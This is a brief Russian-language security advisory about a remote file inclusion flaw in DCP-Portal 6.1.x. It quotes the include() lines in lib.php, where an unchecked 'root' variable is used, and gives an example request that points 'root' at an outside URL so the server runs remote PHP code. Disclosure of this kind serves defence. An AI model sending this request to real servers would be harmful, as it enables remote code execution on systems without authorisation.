Программа: DCP-Portal 6.1.x

Удаленный пользователь может выполнить произвольные команды на сервере. Ошибка обнаружена в lib.php:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

Из-за того, что переменная root не проверяется, нападающий может выполнить произвольный php-код.

Пример:

http://example/[dp_path]/library/lib.php?root=[cmd_url]



Оставить мнение